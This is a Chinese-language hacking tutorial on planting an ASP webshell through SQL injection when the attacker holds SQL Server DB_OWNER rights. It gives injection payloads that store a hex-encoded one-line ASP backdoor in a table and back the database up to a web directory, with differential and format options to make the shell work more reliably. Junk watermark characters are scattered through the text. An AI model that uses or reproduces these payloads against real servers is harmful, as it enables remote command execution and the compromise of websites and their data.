DB_OWNER权限得到webshell的改进办法

admin

DB_OWNER权限得到webshell的两点改进:

减少备份文件大小，得到可执行的webshell成功率提高不少
) s8 V2 r- U9 H* `2 _8 g一利用差异备份
8 H) S" K+ r# m1 i7 W5 G3 o$ W加一个参数WITH DIFFERENTIAL

1
2
3
/ c$ [* i  O/ V0 a" y4
declare @a sysname,@s nvarchar(4000) select @a=db_name(),@s=0x77006F006B0061006F002E00620061006B00 backup database @a to disk=@s
create table [dbo].[xiaolu] ([cmd] [image]);
insert into xiaolu(cmd) values(0x3C25657865637574652872657175657374282261222929253E)
" O5 L' w/ S5 b9 c& a8 sdeclare @a sysname,@s nvarchar(4000) select @a=db_name(),@s=0x65003A005C007700650062005C0077006F006B0061006F002E00610073007000 backup database @a to disk=@s WITH DIFFERENTIAL
* ~1 G3 c, y  I+ K* D# e
! ]* Q5 V- b. ~" q0 h3 {# t9 w( L& x# x二利用完全FORMAT
加一个参数WITH FROMAT
1 c. ]# Q8 Q* V有些页面对数据库要执行几次，而备份又默认是每次都以追加的方式，如果一个注入点对数据库有几次操作，而备份的文件就 几倍的增加，所以
2 e! q$ F' R2 ?0 \/ t* E4 M
1
/ F+ P  m$ x* G  L2
3
4
$ f$ `2 O) a, [6 A declare @a sysname,@s nvarchar(4000) select @a=db_name(),@s=0x77006F006B0061006F002E00620061006B00 backup database @a to disk=@s
0 s8 m: I3 K; D. X5 J5 N. l+ lcreate table [dbo].[xiaolu] ([cmd] [image]);
insert into xiaolu(cmd) values(0x3C25657865637574652872657175657374282261222929253E)
declare @a sysname,@s nvarchar(4000) select @a=db_name(),@s=0x65003A005C007700650062005C0077006F006B0061006F002E00610073007000 backup database @a to disk=@s WITH FORMAT
4 z9 d' S" [) ^
总的来说就是那么简单几句,下面以备份数据库model为例子
1

1
id=1;use model create table cmd(str image);insert into cmd(str) values ('<%25execute(request("a"))%25>')

2

1
id=1;backup database model to disk='你的路径‘ with differential,format;--